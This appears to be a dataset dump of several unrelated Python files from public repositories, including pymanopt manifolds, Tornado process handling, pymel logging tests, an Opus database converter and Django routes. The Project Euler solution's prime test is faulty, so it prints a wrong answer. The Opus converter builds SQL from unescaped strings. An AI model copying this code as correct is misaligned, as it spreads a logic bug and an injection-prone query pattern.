code stringlengths 3-1.05M | repo_name stringlengths 5-104 | path stringlengths 4-251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3-1.05M |
---|---|---|---|---|---|
from math import *
def is_prime(num):
"""Returns True if the number is prime
else False."""
if num == 0 or num == 1:
return False
for x in range(2, num):
if num % x == 0:
return False
else:
return True
def main():
max_divisor = 20
result = 1
    prime_nos = filter(is_prime, range(2, max_divisor + 1))
for prime in prime_nos:
a = floor(log(max_divisor)/log(prime))
result = result * pow(prime, a)
print result
if __name__ == '__main__':
main()
| moghya/hacktoberfest-projecteuler | solutions/problem-5/solution.py | Python | gpl-3.0 | 465 |
import warnings
import numpy as np
from numpy import linalg as la, random as rnd
from scipy.linalg import expm
# Workaround for SciPy bug: https://github.com/scipy/scipy/pull/8082
try:
from scipy.linalg import solve_continuous_lyapunov as lyap
except ImportError:
from scipy.linalg import solve_lyapunov as lyap
from pymanopt.manifolds.manifold import EuclideanEmbeddedSubmanifold, Manifold
from pymanopt.tools.multi import multilog, multiprod, multisym, multitransp
class _RetrAsExpMixin:
"""Mixin class which defers calls to the exponential map to the retraction
and issues a warning.
"""
def exp(self, Y, U):
warnings.warn(
"Exponential map for manifold '{:s}' not implemented yet. Using "
"retraction instead.".format(self._get_class_name()),
RuntimeWarning)
return self.retr(Y, U)
class SymmetricPositiveDefinite(EuclideanEmbeddedSubmanifold):
"""Manifold of (n x n)^k symmetric positive definite matrices, based on the
geometry discussed in Chapter 6 of Positive Definite Matrices (Bhatia
2007). Some of the implementation is based on sympositivedefinitefactory.m
from the Manopt MATLAB package. Also see "Conic geometric optimisation on
the manifold of positive definite matrices" (Sra & Hosseini 2013) for more
details.
"""
def __init__(self, n, k=1):
self._n = n
self._k = k
if k == 1:
name = ("Manifold of positive definite ({} x {}) matrices").format(
n, n)
else:
name = "Product manifold of {} ({} x {}) matrices".format(k, n, n)
dimension = int(k * n * (n + 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return np.sqrt(self.dim)
def dist(self, x, y):
# Adapted from equation 6.13 of "Positive definite matrices". The
# Cholesky decomposition gives the same result as matrix sqrt. There
# may be more efficient ways to compute this.
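        # In formula form (equation 6.13, affine-invariant metric):
        #   dist(X, Y) = || logm(X^{-1/2} Y X^{-1/2}) ||_F
        # The Cholesky factor C (with X = C C^T) can stand in for X^{1/2}
        # because C^{-1} Y C^{-T} is orthogonally similar to
        # X^{-1/2} Y X^{-1/2}, so the norm of the logarithm is unchanged.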
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return la.norm(logm)
def inner(self, x, u, v):
return np.tensordot(la.solve(x, u), la.solve(x, v), axes=x.ndim)
def proj(self, X, G):
return multisym(G)
def egrad2rgrad(self, x, u):
# TODO: Check that this is correct
return multiprod(multiprod(x, multisym(u)), x)
def ehess2rhess(self, x, egrad, ehess, u):
# TODO: Check that this is correct
return (multiprod(multiprod(x, multisym(ehess)), x) +
multisym(multiprod(multiprod(u, multisym(egrad)), x)))
def norm(self, x, u):
        # This implementation is as fast as scipy.linalg.solve_triangular and
        # is more stable, since solve_triangular tends to output results that
        # are not positive definite.
c = la.cholesky(x)
c_inv = la.inv(c)
return la.norm(multiprod(multiprod(c_inv, u), multitransp(c_inv)))
def rand(self):
# The way this is done is arbitrary. I think the space of p.d.
# matrices would have infinite measure w.r.t. the Riemannian metric
# (cf. integral 0-inf [ln(x)] dx = inf) so impossible to have a
# 'uniform' distribution.
# Generate eigenvalues between 1 and 2
d = np.ones((self._k, self._n, 1)) + rnd.rand(self._k, self._n, 1)
# Generate an orthogonal matrix. Annoyingly qr decomp isn't
# vectorized so need to use a for loop. Could be done using
# svd but this is slower for bigger matrices.
u = np.zeros((self._k, self._n, self._n))
for i in range(self._k):
u[i], r = la.qr(rnd.randn(self._n, self._n))
if self._k == 1:
return multiprod(u, d * multitransp(u))[0]
return multiprod(u, d * multitransp(u))
def randvec(self, x):
k = self._k
n = self._n
if k == 1:
u = multisym(rnd.randn(n, n))
else:
u = multisym(rnd.randn(k, n, n))
return u / self.norm(x, u)
def transp(self, x1, x2, d):
return d
def exp(self, x, u):
# TODO: Check which method is faster depending on n, k.
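        # What is computed below is the geodesic of the affine-invariant
        # metric:
        #   exp_X(U) = X expm(X^{-1} U)
        # which equals the more familiar symmetric form
        #   X^{1/2} expm(X^{-1/2} U X^{-1/2}) X^{1/2}.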
x_inv_u = la.solve(x, u)
if self._k > 1:
e = np.zeros(np.shape(x))
for i in range(self._k):
e[i] = expm(x_inv_u[i])
else:
e = expm(x_inv_u)
return multiprod(x, e)
# This alternative implementation is sometimes faster though less
# stable. It can return a matrix with small negative determinant.
# c = la.cholesky(x)
# c_inv = la.inv(c)
# e = multiexp(multiprod(multiprod(c_inv, u), multitransp(c_inv)),
# sym=True)
# return multiprod(multiprod(c, e), multitransp(c))
retr = exp
def log(self, x, y):
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return multiprod(multiprod(c, logm), multitransp(c))
    def zerovec(self, x):
        k = self._k
        n = self._n
        # Match the shapes produced by rand(): (n, n) when k == 1, else (k, n, n).
        if k == 1:
            return np.zeros((n, n))
        return np.zeros((k, n, n))
# TODO(nkoep): This could either stay in here (seeing how it's a manifold of
#              psd matrices), or in fixed_rank. Alternatively, move this one and
# the next class to a dedicated 'psd_fixed_rank' module.
class _PSDFixedRank(Manifold, _RetrAsExpMixin):
def __init__(self, n, k, name, dimension):
self._n = n
self._k = k
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 + self._k
def inner(self, Y, U, V):
# Euclidean metric on the total space.
return float(np.tensordot(U, V))
def norm(self, Y, U):
return la.norm(U, "fro")
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def proj(self, Y, H):
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(H) - H.T.dot(Y)
Omega = lyap(YtY, AS)
return H - Y.dot(Omega)
def egrad2rgrad(self, Y, egrad):
return egrad
def ehess2rhess(self, Y, egrad, ehess, U):
return self.proj(Y, ehess)
def retr(self, Y, U):
return Y + U
def rand(self):
return rnd.randn(self._n, self._k)
def randvec(self, Y):
H = self.rand()
P = self.proj(Y, H)
return self._normalize(P)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize(self, Y):
return Y / self.norm(None, Y)
def zerovec(self, X):
return np.zeros((self._n, self._k))
class PSDFixedRank(_PSDFixedRank):
"""
Manifold of n-by-n symmetric positive semidefinite matrices of rank k.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may
be big). Tangent vectors are represented as matrices of the same size as
    Y, call them Ydot, so that Xdot = Y Ydot' + Ydot Y'. The metric is the
canonical Euclidean metric on Y.
Since for any orthogonal Q of size k, it holds that (YQ)(YQ)' = YY',
we "group" all matrices of the form YQ in an equivalence class. The set
of equivalence classes is a Riemannian quotient manifold, implemented
here.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
An alternative, complete, geometry for positive semidefinite matrices of
rank k is described in Bonnabel and Sepulchre 2009, "Riemannian Metric
and Geometric Mean for Positive Semidefinite Matrices of Fixed Rank",
SIAM Journal on Matrix Analysis and Applications.
The geometry implemented here is the simplest case of the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of "
"rank {:d}".format(n, n, k))
dimension = int(k * n - k * (k - 1) / 2)
super().__init__(n, k, name, dimension)
class PSDFixedRankComplex(_PSDFixedRank):
"""
Manifold of n x n complex Hermitian pos. semidefinite matrices of rank k.
Manifold of n-by-n complex Hermitian positive semidefinite matrices of
fixed rank k. This follows the quotient geometry described
in Sarod Yatawatta's 2013 paper:
"Radio interferometric calibration using a Riemannian manifold", ICASSP.
Paper link: http://dx.doi.org/10.1109/ICASSP.2013.6638382.
A point X on the manifold M is parameterized as YY^*, where Y is a
complex matrix of size nxk of full rank. For any point Y on the manifold M,
given any kxk complex unitary matrix U, we say Y*U is equivalent to Y,
i.e., YY^* does not change. Therefore, M is the set of equivalence
classes and is a Riemannian quotient manifold C^{nk}/U(k)
    where C^{nk} is the set of all complex matrices of size nxk of full rank.
The metric is the usual real-trace inner product, that is,
it is the usual metric for the complex plane identified with R^2.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of Hermitian {:d}x{:d} complex "
"matrices of rank {:d}".format(n, n, k))
dimension = 2 * k * n - k * k
super().__init__(n, k, name, dimension)
def inner(self, Y, U, V):
return 2 * float(np.tensordot(U, V).real)
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
def dist(self, U, V):
S, _, D = la.svd(V.T.conj().dot(U))
E = U - V.dot(S).dot(D)
return self.inner(None, E, E) / 2
def rand(self):
rand_ = super().rand
return rand_() + 1j * rand_()
class Elliptope(Manifold, _RetrAsExpMixin):
"""
Manifold of n-by-n psd matrices of rank k with unit diagonal elements.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may be
big). Tangent vectors are represented as matrices of the same size as Y,
    call them Ydot, so that Xdot = Y Ydot' + Ydot Y' and diag(Xdot) == 0. The
metric is the canonical Euclidean metric on Y.
The diagonal constraints on X (X(i, i) == 1 for all i) translate to
unit-norm constraints on the rows of Y: norm(Y(i, :)) == 1 for all i. The
set of such Y's forms the oblique manifold. But because for any orthogonal
Q of size k, it holds that (YQ)(YQ)' = YY', we "group" all matrices of the
form YQ in an equivalence class. The set of equivalence classes is a
Riemannian quotient manifold, implemented here.
Note that this geometry formally breaks down at rank-deficient Y's. This
does not appear to be a major issue in practice when optimization
algorithms converge to rank-deficient Y's, but convergence theorems no
longer hold. As an alternative, you may use the oblique manifold (it has
larger dimension, but does not break down at rank drop.)
The geometry is taken from the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
self._n = n
self._k = k
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of rank {:d} "
"with diagonal elements being 1".format(n, n, k))
dimension = int(n * (k - 1) - k * (k - 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 * self._k
def inner(self, Y, U, V):
return float(np.tensordot(U, V))
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
# Projection onto the tangent space, i.e., on the tangent space of
# ||Y[i, :]||_2 = 1
def proj(self, Y, H):
eta = self._project_rows(Y, H)
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(eta) - H.T.dot(Y)
Omega = lyap(YtY, -AS)
return eta - Y.dot((Omega - Omega.T) / 2)
def retr(self, Y, U):
return self._normalize_rows(Y + U)
# Euclidean gradient to Riemannian gradient conversion. We only need the
# ambient space projection: the remainder of the projection function is not
# necessary because the Euclidean gradient must already be orthogonal to
# the vertical space.
def egrad2rgrad(self, Y, egrad):
return self._project_rows(Y, egrad)
def ehess2rhess(self, Y, egrad, ehess, U):
scaling_grad = (egrad * Y).sum(axis=1)
hess = ehess - U * scaling_grad[:, np.newaxis]
scaling_hess = (U * egrad + Y * ehess).sum(axis=1)
hess -= Y * scaling_hess[:, np.newaxis]
return self.proj(Y, hess)
def rand(self):
return self._normalize_rows(rnd.randn(self._n, self._k))
def randvec(self, Y):
H = self.proj(Y, self.rand())
return H / self.norm(Y, H)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize_rows(self, Y):
"""Return an l2-row-normalized copy of the matrix Y."""
return Y / la.norm(Y, axis=1)[:, np.newaxis]
# Orthogonal projection of each row of H to the tangent space at the
# corresponding row of X, seen as a point on a sphere.
def _project_rows(self, Y, H):
# Compute the inner product between each vector H[i, :] with its root
# point Y[i, :], i.e., Y[i, :].T * H[i, :]. Returns a row vector.
inners = (Y * H).sum(axis=1)
return H - Y * inners[:, np.newaxis]
def zerovec(self, X):
return np.zeros((self._n, self._k))
| nkoep/pymanopt | pymanopt/manifolds/psd.py | Python | bsd-3-clause | 15,204 |
'''
Created on Oct 16, 2012
@author: paulm
'''
import os
import unittest
import logging
import pymel.internal.plogging as plogging
import pymel.core
class testCase_raiseLog(unittest.TestCase):
DEFAULT_LOGGER = pymel.core._logger
@classmethod
def _makeTest(cls, logLvlName, errorLvlName, logger=None):
logLvl = getattr(logging, logLvlName)
errorLvl = getattr(logging, errorLvlName)
if logger:
funcType = 'method'
func = logger.raiseLog
args = []
else:
funcType = 'function'
func = plogging.raiseLog
args = [cls.DEFAULT_LOGGER]
msg = "attempting %s raiseLog %s (ERRORLEVEL set to %s):" % (logLvlName, funcType, errorLvlName)
args.extend([logLvl, msg])
def raiseLogTest(self):
oldLvl = plogging.ERRORLEVEL
plogging.ERRORLEVEL = errorLvl
try:
kwargs = {'errorClass':TypeError}
if errorLvl <= logLvl:
# the errorLevel is lower than the level we're emitting, it should
# raise an error
self.assertRaises(RuntimeError, func, *args)
self.assertRaises(TypeError, func, *args, **kwargs)
else:
# we should be able to run this without an error...
func(*args)
func(*args, **kwargs)
finally:
plogging.ERRORLEVEL = oldLvl
raiseLogTest.__name__ = 'test_raiseLog_%s_emit_%s_err_%s' % (funcType, logLvlName, errorLvlName)
return raiseLogTest
@classmethod
def addTests(cls):
logLevelNames = ('DEBUG', 'INFO', 'WARNING', 'ERROR')
for logLvlName in logLevelNames:
for errorLvlName in logLevelNames:
for logger in (None, cls.DEFAULT_LOGGER):
test = cls._makeTest(logLvlName, errorLvlName, logger=logger)
setattr(cls, test.__name__, test)
testCase_raiseLog.addTests()
| shrtcww/pymel | tests/test_plogging.py | Python | bsd-3-clause | 2,053 |
#!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities for working with multiple processes, including both forking
the server into multiple processes and managing subprocesses.
"""
from __future__ import absolute_import, division, print_function, with_statement
import errno
import multiprocessing
import os
import signal
import subprocess
import sys
import time
from binascii import hexlify
from tornado import ioloop
from tornado.iostream import PipeIOStream
from tornado.log import gen_log
from tornado.platform.auto import set_close_exec
from tornado import stack_context
from tornado.util import errno_from_exception
try:
long # py2
except NameError:
long = int # py3
def cpu_count():
"""Returns the number of processors on this machine."""
try:
return multiprocessing.cpu_count()
except NotImplementedError:
pass
try:
return os.sysconf("SC_NPROCESSORS_CONF")
except ValueError:
pass
gen_log.error("Could not detect number of processors; assuming 1")
return 1
def _reseed_random():
if 'random' not in sys.modules:
return
import random
# If os.urandom is available, this method does the same thing as
# random.seed (at least as of python 2.6). If os.urandom is not
# available, we mix in the pid in addition to a timestamp.
try:
seed = long(hexlify(os.urandom(16)), 16)
except NotImplementedError:
seed = int(time.time() * 1000) ^ os.getpid()
random.seed(seed)
def _pipe_cloexec():
r, w = os.pipe()
set_close_exec(r)
set_close_exec(w)
return r, w
_task_id = None
def fork_processes(num_processes, max_restarts=100):
"""Starts multiple worker processes.
If ``num_processes`` is None or <= 0, we detect the number of cores
available on this machine and fork that number of child
processes. If ``num_processes`` is given and > 0, we fork that
specific number of sub-processes.
Since we use processes and not threads, there is no shared memory
between any server code.
Note that multiple processes are not compatible with the autoreload
module (or the ``autoreload=True`` option to `tornado.web.Application`
which defaults to True when ``debug=True``).
When using multiple processes, no IOLoops can be created or
referenced until after the call to ``fork_processes``.
In each child process, ``fork_processes`` returns its *task id*, a
number between 0 and ``num_processes``. Processes that exit
abnormally (due to a signal or non-zero exit status) are restarted
with the same id (up to ``max_restarts`` times). In the parent
process, ``fork_processes`` returns None if all child processes
have exited normally, but will otherwise only exit by throwing an
exception.
"""
global _task_id
assert _task_id is None
if num_processes is None or num_processes <= 0:
num_processes = cpu_count()
if ioloop.IOLoop.initialized():
raise RuntimeError("Cannot run in multiple processes: IOLoop instance "
"has already been initialized. You cannot call "
"IOLoop.instance() before calling start_processes()")
gen_log.info("Starting %d processes", num_processes)
children = {}
def start_child(i):
pid = os.fork()
if pid == 0:
# child process
_reseed_random()
global _task_id
_task_id = i
return i
else:
children[pid] = i
return None
for i in range(num_processes):
id = start_child(i)
if id is not None:
return id
num_restarts = 0
while children:
try:
pid, status = os.wait()
except OSError as e:
if errno_from_exception(e) == errno.EINTR:
continue
raise
if pid not in children:
continue
id = children.pop(pid)
if os.WIFSIGNALED(status):
gen_log.warning("child %d (pid %d) killed by signal %d, restarting",
id, pid, os.WTERMSIG(status))
elif os.WEXITSTATUS(status) != 0:
gen_log.warning("child %d (pid %d) exited with status %d, restarting",
id, pid, os.WEXITSTATUS(status))
else:
gen_log.info("child %d (pid %d) exited normally", id, pid)
continue
num_restarts += 1
if num_restarts > max_restarts:
raise RuntimeError("Too many child restarts, giving up")
new_id = start_child(id)
if new_id is not None:
return new_id
# All child processes exited cleanly, so exit the master process
# instead of just returning to right after the call to
# fork_processes (which will probably just start up another IOLoop
# unless the caller checks the return value).
sys.exit(0)
def task_id():
"""Returns the current task id, if any.
Returns None if this process was not created by `fork_processes`.
"""
global _task_id
return _task_id
class Subprocess(object):
"""Wraps ``subprocess.Popen`` with IOStream support.
The constructor is the same as ``subprocess.Popen`` with the following
additions:
* ``stdin``, ``stdout``, and ``stderr`` may have the value
``tornado.process.Subprocess.STREAM``, which will make the corresponding
attribute of the resulting Subprocess a `.PipeIOStream`.
* A new keyword argument ``io_loop`` may be used to pass in an IOLoop.
"""
STREAM = object()
_initialized = False
_waiting = {}
def __init__(self, *args, **kwargs):
self.io_loop = kwargs.pop('io_loop', None) or ioloop.IOLoop.current()
# All FDs we create should be closed on error; those in to_close
# should be closed in the parent process on success.
pipe_fds = []
to_close = []
if kwargs.get('stdin') is Subprocess.STREAM:
in_r, in_w = _pipe_cloexec()
kwargs['stdin'] = in_r
pipe_fds.extend((in_r, in_w))
to_close.append(in_r)
self.stdin = PipeIOStream(in_w, io_loop=self.io_loop)
if kwargs.get('stdout') is Subprocess.STREAM:
out_r, out_w = _pipe_cloexec()
kwargs['stdout'] = out_w
pipe_fds.extend((out_r, out_w))
to_close.append(out_w)
self.stdout = PipeIOStream(out_r, io_loop=self.io_loop)
if kwargs.get('stderr') is Subprocess.STREAM:
err_r, err_w = _pipe_cloexec()
kwargs['stderr'] = err_w
pipe_fds.extend((err_r, err_w))
to_close.append(err_w)
self.stderr = PipeIOStream(err_r, io_loop=self.io_loop)
try:
self.proc = subprocess.Popen(*args, **kwargs)
except:
for fd in pipe_fds:
os.close(fd)
raise
for fd in to_close:
os.close(fd)
for attr in ['stdin', 'stdout', 'stderr', 'pid']:
if not hasattr(self, attr): # don't clobber streams set above
setattr(self, attr, getattr(self.proc, attr))
self._exit_callback = None
self.returncode = None
def set_exit_callback(self, callback):
"""Runs ``callback`` when this process exits.
The callback takes one argument, the return code of the process.
        This method uses a ``SIGCHLD`` handler, which is a global setting
and may conflict if you have other libraries trying to handle the
same signal. If you are using more than one ``IOLoop`` it may
be necessary to call `Subprocess.initialize` first to designate
one ``IOLoop`` to run the signal handlers.
In many cases a close callback on the stdout or stderr streams
can be used as an alternative to an exit callback if the
signal handler is causing a problem.
"""
self._exit_callback = stack_context.wrap(callback)
Subprocess.initialize(self.io_loop)
Subprocess._waiting[self.pid] = self
Subprocess._try_cleanup_process(self.pid)
@classmethod
def initialize(cls, io_loop=None):
"""Initializes the ``SIGCHILD`` handler.
The signal handler is run on an `.IOLoop` to avoid locking issues.
Note that the `.IOLoop` used for signal handling need not be the
same one used by individual Subprocess objects (as long as the
``IOLoops`` are each running in separate threads).
"""
if cls._initialized:
return
if io_loop is None:
io_loop = ioloop.IOLoop.current()
cls._old_sigchld = signal.signal(
signal.SIGCHLD,
lambda sig, frame: io_loop.add_callback_from_signal(cls._cleanup))
cls._initialized = True
@classmethod
def uninitialize(cls):
"""Removes the ``SIGCHILD`` handler."""
if not cls._initialized:
return
signal.signal(signal.SIGCHLD, cls._old_sigchld)
cls._initialized = False
@classmethod
def _cleanup(cls):
for pid in list(cls._waiting.keys()): # make a copy
cls._try_cleanup_process(pid)
@classmethod
def _try_cleanup_process(cls, pid):
try:
ret_pid, status = os.waitpid(pid, os.WNOHANG)
except OSError as e:
if errno_from_exception(e) == errno.ECHILD:
return
if ret_pid == 0:
return
assert ret_pid == pid
subproc = cls._waiting.pop(pid)
subproc.io_loop.add_callback_from_signal(
subproc._set_returncode, status)
def _set_returncode(self, status):
if os.WIFSIGNALED(status):
self.returncode = -os.WTERMSIG(status)
else:
assert os.WIFEXITED(status)
self.returncode = os.WEXITSTATUS(status)
if self._exit_callback:
callback = self._exit_callback
self._exit_callback = None
callback(self.returncode)
| chrisseto/tornado | tornado/process.py | Python | apache-2.0 | 10,630 |
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
import os
import re
from opus_core.logger import logger
from opus_core.database_management.database_server import DatabaseServer
from opus_core.database_management.configurations.database_server_configuration import DatabaseServerConfiguration
class DBSubPattern(object):
def convert_databases(self, db_config, databases, tables, patterns, backup=True, backup_postfix='_old'):
dbconfig = DatabaseServerConfiguration(
host_name = db_config.host_name,
protocol = 'mysql',
user_name = db_config.user_name,
password = db_config.password
)
db_server = DatabaseServer(dbconfig)
for db_name in databases:
db = db_server.get_database(db_name)
self.convert_database(db, tables[db_name], patterns, backup, backup_postfix)
db.close()
db_server.close()
def convert_database(self, db, tables, patterns, backup=True, backup_postfix='_old'):
for table in tables:
self.convert_table(db, table, patterns, backup, backup_postfix)
def convert_table(self, db, table_name, patterns, backup=True, backup_postfix='_old'):
try: db.DoQuery('select * from %s' % table_name)
except: return
if backup:
backup_table_name = '%s%s' % (table_name, backup_postfix)
i=0
while self._table_exists(db, backup_table_name):
i+=1
backup_table_name = '%s%s%d' % (table_name, backup_postfix, i)
db.DoQuery('create table %(backup_table)s select * from %(table)s;'
% {'backup_table':backup_table_name,
'table':table_name})
try: db.DoQuery('select * from %s' % backup_table_name)
except:
logger.log_error("Back up of table '%s' to '%s' failed. "
"Skipping conversion." % (table_name, backup_table_name))
return
results = db.GetResultsFromQuery('select variable_name from %s'
% table_name)[1:]
results = [i[0] for i in results]
for i in range(len(results)):
try:
new_row = results[i]
for pattern, replacement in patterns:
new_row = re.sub(pattern, replacement, new_row)
except TypeError:
continue # Not dealing with a string here.
if new_row == results[i]:
continue # Nothing changed. Don't bother with the update query.
new_row = '"%s"' % new_row
query = ('update %(table)s set variable_name=%(new_row)s where '
'variable_name="%(old_row)s";'
% {'table':table_name,
'new_row':new_row,
'old_row':results[i]})
db.DoQuery(query)
def _table_exists(self, db, table_name):
try: db.DoQuery('select * from %s' % table_name)
except: return False
else: return True
from opus_core.tests import opus_unittest
from opus_core.database_management.configurations.test_database_configuration import TestDatabaseConfiguration
class TestDBSubPattern(opus_unittest.OpusTestCase):
def setUp(self):
self.test_db_names = [
'convert_database_test_db1',
'convert_database_test_db2',
]
self.test_table_names = [
'table1',
'table2',
'table3',
]
table_schema = 'id INT, do_not_change_this_column TEXT, variable_name TEXT'
table_data = (
'(1,"Does not match P A T T E R N.","Matches pattern."),'
'(2,"Matches pattern.","Does not match P A T T E R N."),'
'(3,NULL,NULL),'
'(4,"","")'
)
self.expected_output_unchanged = [
['id', 'do_not_change_this_column', 'variable_name'],
[1,"Does not match P A T T E R N.","Matches pattern."],
[2,"Matches pattern.","Does not match P A T T E R N."],
[3,None,None],
[4,"",""]
]
self.patterns = [
(r'(pattern)(\.)', r'\1 well\2'),
(r'^Matches pattern well\.$', r'Matches pattern perfectly!')
]
self.expected_output_changed = [
['id', 'do_not_change_this_column', 'variable_name'],
[1,"Does not match P A T T E R N.","Matches pattern perfectly!"],
[2,"Matches pattern.","Does not match P A T T E R N."],
[3,None,None],
[4,"",""]
]
insert_items_template = (
"insert into %(table)s values %(data)s;")
table_list = {}
for db_name in self.test_db_names:
table_list[db_name] = []
for table in self.test_table_names:
table_list[db_name] += [table]
self.config = {
'databases':self.test_db_names,
'tables':table_list,
'backup':True,
'backup_postfix':'_old',
}
self.db_server = DatabaseServer(TestDatabaseConfiguration(protocol = 'mysql'))
self.dbs = []
for db_name in self.test_db_names:
self.db_server.drop_database(db_name)
self.db_server.create_database(db_name)
self.dbs += [self.db_server.get_database(db_name)]
for db in self.dbs:
for table_name in self.test_table_names:
db.DoQuery('create table %s (%s)'
% (table_name,
table_schema))
db.DoQuery(insert_items_template
% {'table':table_name, 'data':table_data})
def tearDown(self):
for db_name in self.test_db_names:
self.db_server.drop_database(db_name)
for db in self.dbs:
db.close()
self.db_server.close()
def test_convert_table(self):
DBSubPattern().convert_table(self.dbs[0], self.test_table_names[0],
self.patterns)
db = self.dbs[0]
table0 = self.test_table_names[0]
results = db.GetResultsFromQuery('select * from %s;' % table0)
self.assert_(results == self.expected_output_changed,
"Convert failed for single table (%s) -- incorrect conversion."
" Expected %s. Recieved %s."
% (table0,
self.expected_output_changed,
results))
for table in self.test_table_names[1:]:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for single table (%s) -- incorrect conversion."
" Expected %s. Recieved %s."
% (table,
self.expected_output_unchanged,
results))
for db in self.dbs[1:]:
for table in self.test_table_names:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for single table (%s) -- converted wrong"
" table(s). Expected %s. Recieved %s."
% (table,
self.expected_output_unchanged,
results))
def test_convert_table_backup(self):
db = self.dbs[0]
table = self.test_table_names[0]
DBSubPattern().convert_table(db, table, self.patterns,
backup=True, backup_postfix='_old')
backup_table_name = '%s_old' % table
try:
results = db.GetResultsFromQuery('select * from %s' % backup_table_name)
except:
self.fail("Backup failed for single table (%s) -- backup table (%s) not "
"created." % (table, backup_table_name))
self.assert_(results == self.expected_output_unchanged,
"Backup failed for single table (%s) -- changed contents."
" Expected %s. Recieved %s."
% (table, self.expected_output_unchanged, results)
)
def test_convert_database(self):
DBSubPattern().convert_database(self.dbs[0],
self.test_table_names[0:2], self.patterns)
db = self.dbs[0]
for table in self.test_table_names[0:2]:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_changed,
"Convert failed for database0 (%s) -- incorrect "
"conversion. Expected %s. Recieved %s."
% (table,
self.expected_output_changed,
results))
for table in self.test_table_names[2:]:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for database0 (%s) -- changed wrong table(s)."
" Expected %s. Recieved %s."
% (table,
self.expected_output_unchanged,
results))
for i in range(len(self.dbs[1:])):
db = self.dbs[i+1]
for table in self.test_table_names:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for database%s (%s) -- converted wrong"
" table(s). Expected %s. Recieved %s."
% (i,
table,
self.expected_output_unchanged,
results))
def test_convert_databases(self):
DBSubPattern().convert_databases(TestDatabaseConfiguration(protocol='mysql'),
self.config['databases'], self.config['tables'], self.patterns)
for db_name in self.config['databases']:
db = self.db_server.get_database(db_name)
tables = self.config['tables'][db_name]
for table in tables:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_changed,
"Convert failed %s (%s) -- incorrect conversion."
" Expected %s. Recieved %s."
% (db_name,
table,
self.expected_output_changed,
results))
if __name__ == "__main__":
    opus_unittest.main()
| christianurich/VIBe2UrbanSim | 3rdparty/opus/src/opus_upgrade/changes_2006_11_16_interaction_set_changes/classes/db_sub_pattern.py | Python | gpl-2.0 | 11,789 |
from django.conf import settings
from django.conf.urls import url
from .views import get_summoner_v3, live_match, test_something, live_match_detail, FrontendAppView, ApiLiveMatch, ChampionInfoView
urlpatterns = [
url(r'^summoner/', get_summoner_v3, name='summoner_lookup'),
url(r'^live/$', live_match, name='live_match'),
url(r'^live/([a-zA-Z0-9]+)/(.+)/$', live_match_detail, name='live-match-detail'),
url(r'^api/live/([a-zA-Z0-9]+)/(.+)/$', ApiLiveMatch.as_view(), name='api-live-match'),
url(r'api/champions/$', ChampionInfoView.as_view(), name='api-champion-info'),
url(r'^summonerprofile/', get_summoner_v3, name='summoner_profile'),
url(r'test/', test_something, name='test'),
url(r'^', FrontendAppView.as_view()),
]
| belleandindygames/league | league/champ_chooser/urls.py | Python | mit | 756 |
#!/usr/bin/python
import argparse
import httplib2
import pprint
import base64
from apiclient.discovery import build
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
